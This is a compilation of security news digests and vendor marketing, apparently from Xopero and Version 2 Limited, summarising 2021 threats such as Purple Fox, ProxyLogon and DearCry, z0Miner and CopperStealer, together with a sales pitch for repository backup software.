After discovering an exposed Windows system while scanning for devices reachable over the Internet, Purple Fox’s newly added worm module uses SMB password brute force to infect it. So far, Purple Fox has deployed its malware droppers and additional modules on an extensive network of bots, an army of almost 2,000 compromised servers. Devices ensnared in this botnet include Windows Server machines running IIS version 7.5 and Microsoft FTP, and servers running Microsoft RPC, Microsoft Server SQL Server 2008 R2, and Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service. Purple Fox is also using phishing campaigns and web browser vulnerabilities to deploy its payloads. It also installs a rootkit module that uses the hidden open-source rootkit to hide dropped files and folders or Windows registry entries created on the infected systems. After deploying the rootkit and rebooting the device, the malware will rename its DLL payload to match a Windows system DLL and will configure it to be launched on system start. Once the malware is executed on system launch, each of the infected systems will exhibit the same worm-like behaviour, continuously scanning the Internet for other targets and attempting to compromise them and add them to the botnet. Source

Fleeceware scam earns cybercriminals $400M in revenue so far – it could cost you 3,400 USD per year, every year…

About 204 different fleeceware applications with combined billion+ downloads have raked in more than $400 million in revenue so far, via the Apple App Store and Google Play.
What is a Fleeceware app?
Fleeceware apps generally offer users a free trial to “test” the app, before commencing automatic payments that can be exorbitant. In an analysis from Avast released on Wednesday, some of those subscriptions can reach $3,400 or more per year. And often, users are charged even after they’ve deleted the offending application.
The study
Avast analysed over 200 mobile applications – and then flagged to Apple and Google – and found that most of the offending apps are musical instrument apps, palm readers, image editors, camera filters, fortune tellers, QR code and PDF readers, and something called “slime simulators”. Clearly, many of these apps are marketed towards children. Scammers target children mostly through and catchy advertisements on popular social media platforms such as Facebook, Instagram, Snapchat and TikTok – promising ‘free installation’ or ‘free download’. Most of the apps that Avast discovered are offering a free three-day trial, according to the research. After that, the models vary. Most of the apps charge between $4 to $12 per week, which equates to $208 to $624 per year; but others charge as much as $66 per week, totalling $3,432 per year.
Uninstalling is an option but it doesn’t help
Fleeceware apps are not malware but in this case, users deal with the quasi-permanent state of the “infection”. Both Google and Apple aren’t responsible for subscription refunds after a certain time period, leaving victims with the app developers themselves as their main recourse. And scammers usually don’t cooperate with victims – that’s the unwritten low. So it appears there is very little that victims can do other than contacting their bank and requesting a chargeback.
Fleeceware apps will stay for some time, so be aware
In January, Sophos research uncovered that these type of apps have been installed nearly 600 million times on 100 million-plus devices, just from Google Play alone. This business model is attracting more and more developers – there is big money guaranteed even if only a small percentage of users fall victim to fleeceware. Source

Critical F5 BIG-IP flaw under active attack. Patch ASAP!

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated. The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure and could allow attackers to take full control over a vulnerable system. And it’s worth noting that the F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data. Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP. Fast forward to last week, researchers reported mass scanning for – and in-the-wild exploitation of – the flaw. The U.S. Cybersecurity and Infrastructure Agency (CISA) has urged companies to fix the critical F5 flaw, along with another bug being tracked as CVE-2021-22987 (rating 9.9) which affects the infrastructure’s Traffic Management User Interface (TMUI). The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies. Source

WARNING: A new Android zero-day vulnerability is under active attack

Google has disclosed that a now-patched vulnerability affecting Android devices that use Qualcomm chipsets is being weaponized by adversaries to launch targeted attacks. Tracked as CVE-2020-11261 (CVSS score 8.4), the flaw concerns an “improper input validation” issue in Qualcomm’s Graphics component. It could be exploited to trigger memory corruption when an attacker-engineered app requests access to a huge chunk of the device’s memory. The flaw was discovered and reported by Google’s Android Security team in July 2020, and Qualcomm fixed it in January 2021.
Source: The Hacker News
It’s worth noting that to launch a successful attack, the bad actor must either have physical access to the vulnerable smartphone or use other means – e.g., a watering hole – to deliver malicious code and set off the attack chain. Specifics about the attacks, the identity of the attacker, and the targeted victims have not been undisclosed. Better install the update now to not get listed. Source

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Microsoft releases a one-click ProxyLogon mitigation tool

Welcome to the next episode of the Xopero Security Center. Race against time – that’s the best description of the ProxyLogon situation. First Microsoft has released emergency patches for vulnerable systems. No more than a week later researchers spotted the first ransomware actively exploiting these vulnerabilities. Now users got a one-click ProxyLogon mitigation tool (details below). The keyword is „mitigation” – it mitigates the risk of exploit until the update will be applied. This is not an alternative. The good news – tens of thousands of Microsoft Exchange servers have been patched already. Experts have never seen patch rates this high for any system before. Still, there are about 82k devices vulnerable to the attack. Hence the new tool. Need to find out more? Check the rest of the article.

With this new one-click mitigation tool you can check if ProxyLogon vulnerabilities got to you too

Microsoft has released a one-click Exchange On-premises Mitigation Tool (EOMT) tool to allow small business owners to easily check if their servers are vulnerable to the ProxyLogon vulnerabilities. Recent statistics show that at least 82,000 internet-facing servers are still unpatched and vulnerable to attack. There is still work to do, hence the new tool. The EOMT has been designed to help customers that might not have security or IT staff on hand to help and has been tested across Exchange Server 2013, 2016, and 2019.

It is important to note the tool is not an alternative to patching but should be considered a means to mitigate the risk of exploit until the update has been applied as quickly as possible. 

The ‘EOMT.ps1’ script can be downloaded from Microsoft’s GitHub repository, and when executed, will automatically perform the following tasks:

Mitigates the CVE-2021-26855 Server-Side Request Forgery (SSRF) vulnerability by installing the IIS URL Rewrite module and a regular expression rule that aborts any connections containing the ‘X-AnonResource-Backend’ and ‘X-BEResource’ cookie headers.

Downloads and runs the Microsoft Safety Scanner to remove known web shells and other malicious scripts installed via these vulnerabilities. The script will then remove any malicious files found.

Additionally, admins are advised to also check for indicators of compromise (IOC) in Exchange HttpProxy logs, Exchange log files, and Windows Application event logs.

Source: 1 | 2

New Mirai variant targets SonicWall, D-Link, Netgear and IoT devices

A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices — as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.

The attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit (CVE-2020-25506); Yealink Device Management remote code-execution (RCE) flaws (CVE-2021-27561 and CVE-2021-27562); a Netgear ProSAFE Plus RCE flaw (CVE-2020-26919); an RCE flaw in Micro Focus Operation Bridge Reporter (CVE-2021-22502); and a Netis WF2419 wireless router exploit (CVE-2019-19356 ).

Patches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.

After successfully compromising a device, the attacker dropped various binaries that let them schedule jobs, create filter rules, run brute-force attacks, or propagate the botnet malware. 

The variant is only the latest to rely on Mirai’s source code, which has proliferated into more than 60 variants since bursting on the scene with a massive distributed denial of service (DDoS) takedown of DNS provider Dyn in 2016.

Source: 1 | 2

The curious case of disappearing/deleting Microsoft Teams and SharePoint files

On Monday, Microsoft suffered a massive outage that affected almost all cloud services, including Microsoft 365, Microsoft Teams, Xbox Live, Exchange Online, Outlook.com, and SharePoint. The outage was caused by a configuration issue in the Azure Active Directory service.

That was on Monday… Since Tuesday, numerous Microsoft SharePoint administrators face a new problem – missing files in their clients SharePoint folders. The SharePoint folder structure is still intact, but most or sometimes all of the files are missing. Missing were? Short investigation has shown that these files have been deleted and are now located in SharePoint’s cloud recycle bin, or in some cases, a local PC’s Recycle Bin.

The root of the problem

Microsoft confirmed that the issues are related to its advisories SP244708 (SharePoint) and OD244709 (OnDrive). Both advisories are essentially the same and state that local copies of OneDrive for Business or SharePoint files will be restored after initiating a resync. The cause for both issues is the same as well – Monday’s Azure Active Directory (AAD) outage.

While each advisory states that the outage has caused local data to become unavailable, neither advisory explains why the files are being deleted from SharePoint’s cloud folders and why users continue to see this happening after the outage has been resolved.

And… it is still not the end. To make matters worse numerous Microsoft Teams Free users report that files shared on their channels are no longer accessible on either the desktop or web client.

Image: Bleeping Computer

According to Microsoft Teams Engineering PM Sam Cosby, his team found the cause for the missing files and would be applying mitigations as soon as they can. He did not share what was causing the users’ files to go missing in the first place.

Source

New CopperStealer malware hijacks social media accounts

Researchers with Proofpoint released details on new undocumented malware called CopperStealer. It steals social media logins and spreads more malware.

CopperStealer has many of the same targeting and delivery methods as SilentFade, a Chinese-sourced malware family first reported by Facebook in 2019.

The Copperstealer malware attempts to steal the account passwords to Facebook, Instagram, Google, and other major service providers, according to Proofpoint. The stolen passwords are used to run malicious ads for profit and spread more malware.

Researchers were first alerted to the malware sample in late January. The earliest discovered samples date back to July 2019. 

According to Proofpoint they also identified additional versions that target other major service providers, including Apple, Amazon, Bing, Google, PayPal, Tumblr and Twitter. 

How to protect your social media accounts against CopperStealer? Better turn on two-factor authentication as soon as possible. 

Source

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Git Repository Backup: third-party software or your own script

When it comes to files, endpoints, servers, or VMs – a third-party backup software is something obvious that nearly every business needs and should have. Unlike repository backup which is not so obvious, but of equal importance. As CTO, IT manager, software-house owner, or team leader – you probably can imagine how much it would cost you to lose the code your team has been working on for months… if not, try to calculate…

Repository backup – why do you need it?

Data breaches, systems downtime, malware, malicious employee, human errors, policy changes, and more – all of those factors can limit access to your repositories and put your intellectual property at risk. Even if you use such trusted Git-based source code repository hosting services provided by Microsoft or Atlassian, you still are at risk of losing data.

In the previous articles, we described reasons to backup repositories – both in GitHub and Bitbucket. So if you still need to ensure yourself – go here, read articles, and see you back within a few minutes.

Managing your own repository backup – pros and cons

Managing backups in-house obligates you to manage all the infrastructure, processes, ongoing maintenance, and repair costs to make your internal backups. While in the beginning, it might seem cost-effective, in a long-term perspective maintenance cost and working hours of the employees managing backups can cost you a fortune.

PRO: Full control & customization

Managing your own repository backups lets you decide how it should work to meet your company’s requirements and specifications. You know how it should integrate with other elements of your business. Finally – you know what kind of data you want to protect, how often this backup should perform, and how – you can customize it.

CON: Responsibility, distraction, and high long-term costs

If you want to make your own backups you have to dedicate internal employees to work on it, test it on a regular basis, maintain it and enable some form of data retention – unless you have to keep in mind to manually remove older backup copies to make room for new ones.. Even if it’s just a part-time job of your employee, it distracts him from his core duties. And now – let’s assume that you sacrificed your employee time and you finally have your own backup script. Now somebody has to test it and maintain it as a part of his routine. As in most software, only in the backup case, most costs occur after implementation.

Moreover, if the event of failure happens and your backup script fails so you won’t be able to restore the data, the only person you can blame is yourself. Or at least your management will do that. Are you sure you need this additional responsibility on your shoulders?

Third-party repository backup – pros and cons

When you are buying a third-party repository backup you know you pay for removing responsibility from your head, saving your employees time so they can focus on core duties, reducing maintenance, and administration costs, and data protection guarantee. Initial higher-cost seems now pretty slight when you consider it in the long-term. It turns out that it’s a pretty small investment for peace of mind…

PRO: All the best of backup solution

The third-party repository backup solution such as for instance Xopero ONE Backup & Recovery enables you to protect all GitHub and Bitbucket data – no matter what hosting service you use. You can backup all GitHub and Bitbucket: servers, repos, and metadata – both local and cloud. Including comments, requests, milestones, issues, wikis and much more.

Using a dedicated repository backup you make sure you use years of experience of a backup service provider on the backup market that protects all mission-critical data – including files, endpoints, servers, virtual machines, SaaS, etc. (and on which btw. you can take advantage on)

So, except for some dedicated features, you have access to the best features such as:

  • any storage compatibility (you can store your copies on SMB network shares, local disc resources, public clouds)
  • full automation (“set-and-forget”) and central management
  • predefined backup plans or advanced plan customization (so you can adjust backup performance to your company requirements and specification)
  • wide range of recovery options (including granular, point-in-time recovery, cross-user recovery)

Even if you delegate your best developers to write you a backup script, they probably won’t be able to deliver you such advanced and secure features as a professional backup provider and won’t ensure you with the same guarantee of data accessibility and recoverability.

PRO:  Repository backup security and recovery guarantee

Speaking about best practices – for all third-party professional backup service providers security is an integral part of their DNA. They need to make sure that the data is protected, recoverable, and accessible anytime and as fast as you need it. As your business probably relies on software and digital assets more than ever before, make sure the repository backup software you use provides you with encryption (AES is desired), zero-knowledge encryption, and no-single-point-of-failure, web-based architecture. Additionally, if something is wrong with your copy, you should be informed about it by daily reports, logs and special notifications.

CON: Limited control 

Like with every kind of third-party software you don’t have control over each aspect of its pricing or terms of services changes in the future. So you should consider what is more important to you – choosing a third-party software with limited control and team’s focus on solving core business problems or preparing and maintaining your own backup procedures over which you have full control with devoting priceless time of your own internal developers.

PRO: Lower long-term costs 

You might think a third-party repository backup solution is an expensive option. But try to calculate how much you are going to pay for preparing internal repository protection procedures and backup scripts. Then, to this sum add hours spent on maintenance, tests, and administration of your employee and alternate cost – how much money would this employee bring you while he would do his normal work instead. And of course, take his word that your data is secured. I will make a bet, that initial higher costs seem pretty slight now – long-term costs of a third-party backup solution now seem more attractive, and your employees can focus on what they are best at – their work.

PRO: Meeting the shared responsibility model 

Whether you use GitHub or Bitbucket, like most SaaS providers, those two also rely on shared responsibility models. In short: service providers are responsible for the accessibility and availability of their platforms while you, as a data owner, are responsible for data protection. Are you sure that your own, internal solution is safe enough? Have you considered all possible scenarios of losing your data? Finally, do you have it tested? With a third-party backup solution you share this concern – now also an external company is responsible for keeping your data safe.

Conclusion

If you can make your own pizza – why do you normally buy it instead? Well, probably because this way you can get it faster, better – well backed and tasty – and delivered to your door. And at least no one will blame you for stomach problems. Then, why do you want to make your own backup solution and take responsibility for such crucial issues as your business data?

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Z0Miner malware / DearCry ransomware and ProxyLogon exploits / reCAPTCHA phishing

Welcome to the next episode of the Xopero Security Center. This time we are taking a closer look into the Z0Miner malware case – a new threat against unpatched ElasticSearch and Jenkins servers. MS Exchange servers are under attack too. Remember the four new zero-day vulnerabilities discovered a few weeks ago? They have got a fancy name now – ProxyLogon exploits – and very effective [DearCry] ransomware which is targeting vulnerable devices. What’s next? There is also a novel phishing attack that uses fake Google reCAPTCHA to swipe Microsoft 365 credentials. There were also some problems with the GitHub logging mechanism. Details can be found below.

Unpatched ElasticSearch and Jenkins servers are now easy prey for z0Miner botnet

A cryptomining botnet discovered last year is now taking control of Jenkins and ElasticSearch servers to mine for Monero (XMR) cryptocurrency.

z0Miner spotted in November 2020 by the Tencent Security Team, has been infecting thousands of servers by exploiting a Weblogic security vulnerability. Now, the attackers have upgraded the malware to scan for and attempt to infect new devices by exploiting remote command execution (RCE) vulnerabilities impacting ElasticSearch and Jenkins servers:

ElasticSearch RCE vulnerability tracked as CVE-2015-1427
and an older RCE impacting Jenkins servers.

After compromising a server, the malware will first download a malicious shell script, starts hunting for and killing previously deployed cryptominers. Next, it sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin. The next stage of the infection flow involves downloading a mining kit containing an XMRig miner script, a config file, a starter script, and starting to mine cryptocurrency in the background.

Last year attackers were able to compromise and took over 5,000 servers. After a short break, z0Miner botnet activity has started picking up again during mid-January. 

Image: 360 Netlab

Specialists recommend ElasticEearch and Jenkins users to check their systems and update them in time, check for abnormal processes and network connections, and monitor and block irrelevant IP and URLs.

Source

Novel phishing attack uses fake Google reCAPTCHA to swipe your Microsoft 365 credentials

The phishing emails pretend to be automated emails from victims’ unified communications tools, which say that they have a voicemail attachment. For instance, one email tells users that “(503) ***-6719 has left you a message 35 second(s) long on Jan 20” along with a lone attachment that’s titled “vmail-219.HTM.” Another tells email recipients to “REVIEW SECURE DOCUMENT.”

Image: Zscaler

When the victims click on the attachment, they then encounter the fake Google reCAPTCHA screen, which contains a typical reCAPTCHA box

The emails first take recipients to a fake Google reCAPTCHA system page. Google reCAPTCHA is a service that helps protect websites from spam and abuse, by using a Turing test to tell humans and bots apart (through asking a user to click on a fire hydrant out of a series of images, for instance).

Once victims “pass” the reCAPTCHA test, they are then redirected to a phishing landing page, which asks for their Office 365 credentials. Attackers have done their homework and are customizing their phishing landing pages to fit their victims’ profile, in order to make the attack appear more legitimate. In this step, victims are asked to input their credentials into the system. Once they do so, a message tells them that the validation was successful.  Users are then shown a recording of a voicemail message that they can play, allowing threat actors to avoid suspicion.

Who is the main target?

This time attackers are aiming to Vice President and Managing Director who are likely to have a higher degree of access to sensitive company data. According to researchers, at least 2,500 such emails have been sent to senior-level employees in the banking and IT sector, over the past three months.

Source

New DearCry ransomware now attacks Microsoft Exchange servers with ProxyLogon exploits

Week ago we pushed you to urgently patch four critical zero-day flaws in Microsoft Exchange. Unfortunately, last week fears became a reality and threat actors are using those named ProxyLogon vulnerabilities to install the DearCry ransomware.

According to Michael Gillespie, the creator of the ransomware identification site ID-Ransomware, starting on March 9, users began submitting a new ransom note and encrypted files to his system. 

Microsoft has confirmed that the DearCry ransomware is installed in human-operated attacks on Microsoft Exchange servers using the ProxyLogon vulnerabilities.

MalwareHunterTeam was able to find three samples of this ransomware on VirusTotal, all of which are MingW-compiled executables.

When launched, the DearCry ransomware will attempt to shut down a Windows service named ‘msupdate.’ It is not known what this service is, but it does not appear to be a legitimate Windows service. The ransomware will now begin to encrypt the files on the computer. When encrypting files, it will append the .CRYPT extension to the file’s name.

Gillespie told that the ransomware uses AES-256 + RSA-2048 to encrypt the files and prepends the ‘DEARCRY!’ string to the beginning of each encrypted file.

When done encrypting the computer, the ransomware will create a simple ransom note named ‘readme.txt’ on the Windows desktop. For at least one of the victims, the ransomware group demanded a $16,000 ransom.

Unfortunately, the ransomware does not appear to have any weaknesses that would allow victims to recover their files for free. For now, the only option is to recover data from a backup – that is why it is so important to have proven data backup software.

According to new data shared by Palo Alto Networks, tens of thousands of Microsoft Exchange servers have been patched over the last days – experts admit that they have never seen patch rates this high for any system before. Unfortunately, the company states that there are still approximately 80,000 older servers that cannot directly apply the recent security updates.

All organizations are strongly advised to apply the patches as soon as possible! 

Source

GitHub fixes bug causing users to log into other accounts

On the night of March 8/9, GitHub automatically logged out many users by invalidating their GitHub.com sessions to protect user accounts against a potentially serious security vulnerability.

Earlier this month GitHub had received a report of anomalous behavior from an external party. It stemmed from a rare race condition vulnerability in which a GitHub user’s login session was misrouted to the web browser of another logged-in user, giving the latter an authenticated session cookie of and access to the former user’s account. So GitHub signed out all users that were logged in prior to March 8th, 12:03 UTC in the final step taken to patch the bug. 

The vulnerability, according to GitHub, could be exploited in extremely rare circumstances when a race condition would occur during the backend request handling process. In such a case, the session cookie of a logged-in GitHub user would be sent to the browser of another user, giving the latter access to the former user’s account.

The company states that the underlying bug was present on GitHub.com for a cumulative period of under two weeks at certain points in time between February 8th and March 5th, 2021. There is no evidence that other GitHub.com assets or products such as GitHub Enterprise Server were impacted as a result of this bug.

GitHub states that fewer than 0.001% of authenticated sessions on GitHub.com occured misrouting. Accounts owners affected by this issue were contacted by GitHub with additional information and guidance.

0,001% seems insignificant but considering GitHub gets over 32 million active visitors (authenticated or not) in a month it could be tens of thousands of accounts. 

Authentication vulnerabilities like these if exploited by adversaries can pave the way for covert software supply-chain attacks. While GitHub proved itself as a very reliable code hosting platform, problems are inevitable to all service providers. Code as intellectual property might be the most valuable asset within your organization – make sure it is well protected and consider a third-party GitHub backup

Such as Xopero ONE for GitHub – sign up to beta tests.

Source

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.